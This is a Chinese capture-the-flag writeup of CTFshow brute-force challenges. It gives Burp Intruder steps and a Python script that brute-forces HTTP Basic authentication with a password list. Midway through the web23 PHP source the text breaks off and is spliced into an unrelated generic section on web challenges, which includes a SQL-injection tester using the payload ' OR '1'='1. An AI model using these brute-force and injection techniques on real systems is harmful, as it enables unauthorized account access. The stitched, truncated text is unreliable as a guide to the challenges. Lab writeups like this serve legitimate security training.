CTFshow——web入门——爆破web21-web28 详细Writeup

Web安全挑战:爆破与密码验证,
文章讲述了在Web安全挑战中,通过抓包、Base64编码、爆破技术(如Intruder和BurpSuite)破解登录凭证的过程,涉及MD5哈希、随机数生成及特定条件验证,最终获取flag。

web21

爆破什么的,都是基操

image-20230801133040217
要求我们登录,但是什么都没给,只能通过爆破来登录

利用题目给我们的字典和burp进行爆破,先抓包

image-20230801133535212

查看请求头看见账号密码是以base64编码形式发送的,解密一下可看见格式是账号:密码,先发送到Intruder

image-20230801134511161

攻击方式选择狙击手(Sniper),将要爆破的字段添加变量,然后点击Payloads
image-20230801134801865

接下来开始爆破,选择自定义迭代器,猜测用户名是admin,并且:也是固定的

在位置1添加admin:

image-20230801135113979

位置2导入密码字典

image-20230801135200267

在下面有效负载处理添加base64编码

image-20230801135242419

注意不要选择url编码字符

image-20230801135303129

然后返回点开始攻击

image-20230801135824484

爆破出结果后按照长度排序(不然很难找),得到flag

image-20230801135805073

也可以用脚本来爆破

import time
import requests
import base64

url = 'http://f3975ea2-66c3-456e-9161-3284b75296e5.challenge.ctf.show/index.php'

password = []

with open("1.txt", "r") as f:  
	while True:
	    data = f.readline() 
	    if data:
	    	password.append(data)
	    else:
	      break
	    


for p in password:
	strs = 'admin:'+ p[:-1]
	header={
   
   
		'Authorization':'Basic {}'.format(base64.b64encode(strs.encode('utf-8')).decode('utf-8'))
	}
	rep =requests.get(url,headers=header)
	time.sleep(0.2)
	if rep.status_code ==200:
		print(rep.text)
		break

跑出结果

image-20230801140119443

web22

域名也可以爆破的,试试爆破这个ctf.show的子域名

但是域名更新后,flag.ctf.show域名失效

内容是flag{ctf_show_web},直接交就可以了

web23

还爆破?这么多代码,告辞!

打开后得到源码

<?php
error_reporting(0);

include('flag.php');
if(isset($_GET['token'])){
   
   
    $token = md5($_GET['token']);
    if(substr($token, 1,1)===substr($token, 14,1) && substr($token, 14,1) ===substr($token, 17,1)){
   
   
        if((intval(substr($token, 1,1))+intval(substr($token<
### CTF SHOW Web 类别挑战资源与解决方案 对于参与CTF SHOW平台上Web类别的挑战,特别是针对`web4`这一具体题目,可以借鉴一些通用的Web安全漏洞利用技巧以及特定于该平台的经验分享。通常情况下,这类挑战会涉及到常见的Web应用程序漏洞,如SQL注入、跨站脚本攻击(XSS)、文件包含漏洞(LFI/RFI)等。 为了更好地理解和解决这些挑战,可以从以下几个方面入手: #### 学习基础理论和技术 深入理解HTTP协议的工作原理及其请求响应机制是非常重要的。掌握如何通过浏览器开发者工具分析网络流量可以帮助识别潜在的安全问题[^1]。 #### 利用在线学习资源 有许多优质的网站提供了关于Web渗透测试的学习材料和实践环境,例如OWASP Top Ten项目文档,它列举并解释了当前最严重的Web应用风险;还有像PortSwigger Academy这样的平台提供了一系列课程来教授各种类型的Web漏洞挖掘方法。 #### 参考社区讨论和Writeup 加入相关的技术论坛或社交媒体群组,在那里可以看到其他参赛者发布的writeups(解题报告),这对于获取灵感非常有帮助。GitHub上也有很多开源仓库专门收集整理了不同赛事下的高质量writeup链接集合。 ```python import requests def check_sql_injection(url, param): test_payload = "' OR '1'='1" data = {param: test_payload} response = requests.post(url, data=data) if "Welcome" in response.text: print(f"[+] SQL Injection vulnerability detected on parameter '{param}'!") else: print("[-] No SQL Injection found.") ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leafzzz__

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值